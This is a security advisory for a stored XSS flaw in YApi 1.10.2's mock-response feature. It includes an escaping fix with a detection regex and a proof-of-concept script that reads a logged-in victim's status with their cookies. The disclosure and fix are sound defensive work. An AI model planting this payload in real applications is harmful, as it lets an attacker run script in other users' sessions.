yapi
yapi 1.10.2 (2021-10-13) has a stored XSS vulnerability
Summary
A stored XSS vulnerability exists in YApi 1.10.2 (2021-10-13) that allows an attacker to store arbitrary HTML code, including script, which then executes in the browsers of other users.
Details
In the Advanced Expectation feature, a user can place arbitrary HTML code in the response body, which should not be allowed. Because the mock response is served from the same origin as the application, the same-origin policy offers no protection, so any user present on the system can be attacked through this vulnerability.
Therefore, the ideal solution is to filter and escape the user-defined body field.
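As an added illustration of the escaping fix suggested above (not YApi's own code; the function names, the text/plain content type and the extra headers are assumptions), the helper below escapes the user-defined body before it is served and, as defense in depth, returns headers that keep a browser from rendering the mock response as a document. The sample body is the one from the PoC.

```javascript
// Added example, not YApi's own code. Escapes a stored mock body so that
// HTML placed in the "Advanced Expectation" response cannot run as script.

// HTML-significant characters and their entity forms.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Escape every HTML-significant character in the user-defined body field.
function escapeMockBody(body) {
  return String(body).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Defender-side check: does a stored body still contain markup a browser
// could execute? Useful for auditing existing records after the fix.
function containsActiveHtml(body) {
  return /<\s*(script|iframe|object|embed|svg|img|body)\b|javascript:|on\w+\s*=/i
    .test(String(body));
}

// Build the mock response: escaped body plus headers (assumed names/values)
// that stop the browser from interpreting the reply as an HTML document.
function buildMockResponse(rawBody) {
  return {
    headers: {
      'Content-Type': 'text/plain; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
      'Content-Security-Policy': "default-src 'none'",
    },
    body: escapeMockBody(rawBody),
  };
}

// Constructed sample input: the body from the PoC in this advisory.
const POC_BODY = `<!DOCTYPE html>
<script>
fetch('https://your-ip/api/user/status', { credentials: 'include' })
  .then(r => r.json()).then(d => alert(JSON.stringify(d)));
</script>`;

const hardened = buildMockResponse(POC_BODY);
console.log(hardened.headers);
console.log(hardened.body); // the <script> tag is now &lt;script&gt;
```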
POC
- Register and log in to your account, create a project, and add an interface.
- Choose "Advanced Expectation - Response."
- Modify the body to:
<!DOCTYPE html>
<script>
  // Request the current user's status from the same origin,
  // sending the visitor's own session cookies with the request.
  fetch('https://your-ip/api/user/status', {
    method: "GET",
    headers: {
      "Accept": "application/json"
    },
    credentials: 'include'
  })
    .then(response => response.json())
    .then(data => {
      // Display the returned JSON to show that it was readable.
      alert(JSON.stringify(data));
    })
    .catch(err => {
      console.error('Error:', err);
      alert('An error occurred while fetching data');
    });
</script>
Visit the mock URL of the interface, for example:
https://localhost/mock/4089/test